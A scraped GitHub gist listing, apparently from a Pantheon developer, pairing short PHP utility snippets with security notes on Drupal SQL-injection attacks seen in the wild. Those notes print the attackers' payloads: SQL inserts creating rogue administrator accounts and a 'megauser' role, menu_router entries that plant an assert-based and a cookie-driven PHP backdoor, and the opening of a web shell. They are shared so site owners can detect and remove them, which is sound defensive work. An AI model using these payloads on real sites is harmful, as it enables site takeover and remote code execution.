Josh Koenig joshkoenig

## pantheon_mass_update.php
<?php

// YOUR LOGIN INFO HERE:
$email = '';
$password = '';
// RUNNING IT FOR A PANTHEON ONE "ORGANIZATION": UNCOMMENT AND ADD YOUR UUID HERE
// $organiztion_uuid = 'some-org-uuid-here';

// helper function
function terminus_json($command) {

## bindata.md

      
              1 file
            
          
              0 forks
            
          
              7 comments
            
          
              2 stars
            
          
                joshkoenig
                / bindata.md
            
            
              Last active
              August 29, 2015 14:07
            
              
                Remote code execution attempt: will insert this binary data into the menu_router table: #drupalsa05
              
          
    0x613a323a7b693a303b733a32333a226d6f64756c65732f7379736c6f672f727068622e706870223b693a313b733a3134373a223c3f7068702024666f726d313d40245f434f4f4b49455b224b63716633225d3b206966202824666f726d31297b20246f70743d24666f726d312840245f434f4f4b49455b224b63716632225d293b202461753d24666f726d312840245f434f4f4b49455b224b63716631225d293b20246f707428222f3239322f65222c2461752c323932293b207d20706870696e666f28293b223b7d
This attack will add file_put_contents() as the access_callback in your menu_router table.
Subsequently, that path is used attempt to drop more exploit code.
Look in menu router for file_put_contents and remove it if found.

  
## sqli.sql
# Another exploit we are re seeing on Pantheon
#
# Creates "megauser role with elevated permissions"
#########################################
insert into users (uid,`name`,`pass`,status) select max(uid)+1,0x64727570616c646576 ,0x245324437274333435366767706141636d4e39447868367a674c66637736384c4e62697a5a6543726f2e4561574d33427a634b6a316835,1 from users;
insert into users_roles(uid,rid) select uid,1000 from users where name like 0x64727570616c646576;
INSERT INTO role (rid,name, weight) VALUES (1000,'megauser', '999')
INSERT INTO role_permission (rid, permission, module) VALUES (1000, 'administer blocks', 'block'),(1000, 'administer filters', 'filter'),(1000, 'bypass node access', 'node'),(1000, 'administer content types', 'node'),(1000, 'administer nodes', 'node'),(1000, 'access content overview', 'node'),(1000, 'access content', 'node'),(1000, 'view own unpublished content', 'node'),(1000, 'view revisions', 'node'),(1000, 'revert revisions', 'node'),(1000, 'delete revisions', 'node'),(1000, 'administer modules

## attack.sql
insert into menu_router (path,load_functions,to_arg_functions,description,access_callback,access_arguments) values (0x666176636f6e,0x00,0x00,0x00,0x617373657274,0x613a313a7b693a303b733a31393a224061737365727428245f504f53545b645d293b223b7d)

Translates to:

path: favcon
access_callback: assert
access_arguments: a:1:{i:0;s:19:"@assert($_POST[d]);";}

This appears to set the stage for a follow-up where there's an attack payload in the POST.

## gist:dbb543c02198330cbf87
Another new attack:

insert into users (status, uid, name, pass) SELECT 1, MAX(uid)+1, 'configure', '$S$DORA9TpsVNowA9zZF1sP26SpnV8OGc6pvLPOzUc.PrNd5zzXmL./' FROM users;insert into users_roles (uid, rid) VALUES ((SELECT uid FROM users WHERE name = 'configure'), 3);

Will try to create a new user named "configure" with the "admin" role in a default Drupal install.

If you see something, say something.

## gist:fdd6a0b382c813ab7c33
Here's the latest attack we're seeing:

insert into users values (99992, 'drplsys', '$S$DeaaG6rBb1N73WEtKMW.cvIwP3f9/VP1M9ZJVu1mRiaH/bGu1bTK', '4585856489@mail.com', '', '', NULL,0,0,0,1,NULL,'',0,'',NULL);

Will create a fake user account. There doesn't appear to be a follow-on attack to use it for anything, yet.

Stay alert. Stay alive.

## removeds.php
## Attack: INSERT INTO `menu_router` (`path`, `load_functions`, `to_arg_functions`, `description`, `access_callback`, `access_arguments`) VALUES ('removeds', '', '', 'removeds', 'preg_replace', [big hex blob])

# The big hex blob in the menu router translates into:

<?php
ini_set('output_buffering',0);
if(@set_time_limit(0) || ini_set('max_execution_time', 0)) $limit = 'not limited';
else $limit = get_cfg_var('max_execution_time');

if(isset($HTTP_SERVER_VARS) && !isset($_SERVER)){

## verison_check.php
<?php
# Making use of: http://php.net/manual/en/function.phpversion.php
#
# The idea is you'd stick this in your core class at the top to prevent execution
# on out-dated runtime environments.
#
# You could use 50300 if you only care about 5.3, but it's EOL too, so...
if (!defined('PHP_VERSION_ID')) || PHP_VERSION_ID < 50400) {
  # Inform users they need to upgrade their PHP version (or have their host do so)
  # It'd be great if there was a common message or link to send users.

## server_name_and_port.php
<?php

/**
 * Problem: there's code out there that relies on $_SERVER['SERVER_NAME'] and sometimes $_SERVER['SERVER_PORT']
 * to construct urls, either to "call itself" or to create urls that are passed to third parties and expect to
 * be routed back.
 *
 * This doesn't work well on Pantheon because the environmental data will be for ephemeral container data.
 *
 * In general, you don't want your code to rely on this, but if you are using some piece of contrib you may

## bgp_tweak.php
# ADDED AN "X-.*" TO THE END TO AVOID RE-SENDING CUSTOM HEADERS.

/**
 * Remove headers we do not wish to pass on to the next request.
 *
 * @param $headers
 *   Headers to filter
 * @return array
 *   Filtered headers
 */
	<?php

	// YOUR LOGIN INFO HERE:
	$email = '';
	$password = '';
	// RUNNING IT FOR A PANTHEON ONE "ORGANIZATION": UNCOMMENT AND ADD YOUR UUID HERE
	// $organiztion_uuid = 'some-org-uuid-here';

	// helper function
	function terminus_json($command) {
	# Another exploit we are re seeing on Pantheon
	#
	# Creates "megauser role with elevated permissions"
	#########################################
	insert into users (uid,`name`,`pass`,status) select max(uid)+1,0x64727570616c646576 ,0x245324437274333435366767706141636d4e39447868367a674c66637736384c4e62697a5a6543726f2e4561574d33427a634b6a316835,1 from users;
	insert into users_roles(uid,rid) select uid,1000 from users where name like 0x64727570616c646576;
	INSERT INTO role (rid,name, weight) VALUES (1000,'megauser', '999')
	INSERT INTO role_permission (rid, permission, module) VALUES (1000, 'administer blocks', 'block'),(1000, 'administer filters', 'filter'),(1000, 'bypass node access', 'node'),(1000, 'administer content types', 'node'),(1000, 'administer nodes', 'node'),(1000, 'access content overview', 'node'),(1000, 'access content', 'node'),(1000, 'view own unpublished content', 'node'),(1000, 'view revisions', 'node'),(1000, 'revert revisions', 'node'),(1000, 'delete revisions', 'node'),(1000, 'administer modules
	insert into menu_router (path,load_functions,to_arg_functions,description,access_callback,access_arguments) values (0x666176636f6e,0x00,0x00,0x00,0x617373657274,0x613a313a7b693a303b733a31393a224061737365727428245f504f53545b645d293b223b7d)

	Translates to:

	path: favcon
	access_callback: assert
	access_arguments: a:1:{i:0;s:19:"@assert($_POST[d]);";}

	This appears to set the stage for a follow-up where there's an attack payload in the POST.
	Another new attack:

	insert into users (status, uid, name, pass) SELECT 1, MAX(uid)+1, 'configure', '$S$DORA9TpsVNowA9zZF1sP26SpnV8OGc6pvLPOzUc.PrNd5zzXmL./' FROM users;insert into users_roles (uid, rid) VALUES ((SELECT uid FROM users WHERE name = 'configure'), 3);

	Will try to create a new user named "configure" with the "admin" role in a default Drupal install.

	If you see something, say something.
	Here's the latest attack we're seeing:

	insert into users values (99992, 'drplsys', '$S$DeaaG6rBb1N73WEtKMW.cvIwP3f9/VP1M9ZJVu1mRiaH/bGu1bTK', '4585856489@mail.com', '', '', NULL,0,0,0,1,NULL,'',0,'',NULL);

	Will create a fake user account. There doesn't appear to be a follow-on attack to use it for anything, yet.

	Stay alert. Stay alive.
	## Attack: INSERT INTO `menu_router` (`path`, `load_functions`, `to_arg_functions`, `description`, `access_callback`, `access_arguments`) VALUES ('removeds', '', '', 'removeds', 'preg_replace', [big hex blob])

	# The big hex blob in the menu router translates into:

	<?php
	ini_set('output_buffering',0);
	if(@set_time_limit(0) \|\| ini_set('max_execution_time', 0)) $limit = 'not limited';
	else $limit = get_cfg_var('max_execution_time');

	if(isset($HTTP_SERVER_VARS) && !isset($_SERVER)){
	<?php
	# Making use of: http://php.net/manual/en/function.phpversion.php
	#
	# The idea is you'd stick this in your core class at the top to prevent execution
	# on out-dated runtime environments.
	#
	# You could use 50300 if you only care about 5.3, but it's EOL too, so...
	if (!defined('PHP_VERSION_ID')) \|\| PHP_VERSION_ID < 50400) {
	# Inform users they need to upgrade their PHP version (or have their host do so)
	# It'd be great if there was a common message or link to send users.
	<?php

	/**
	* Problem: there's code out there that relies on $_SERVER['SERVER_NAME'] and sometimes $_SERVER['SERVER_PORT']
	* to construct urls, either to "call itself" or to create urls that are passed to third parties and expect to
	* be routed back.
	*
	* This doesn't work well on Pantheon because the environmental data will be for ephemeral container data.
	*
	* In general, you don't want your code to rely on this, but if you are using some piece of contrib you may
	# ADDED AN "X-.*" TO THE END TO AVOID RE-SENDING CUSTOM HEADERS.

	/**
	* Remove headers we do not wish to pass on to the next request.
	*
	* @param $headers
	* Headers to filter
	* @return array
	* Filtered headers
	*/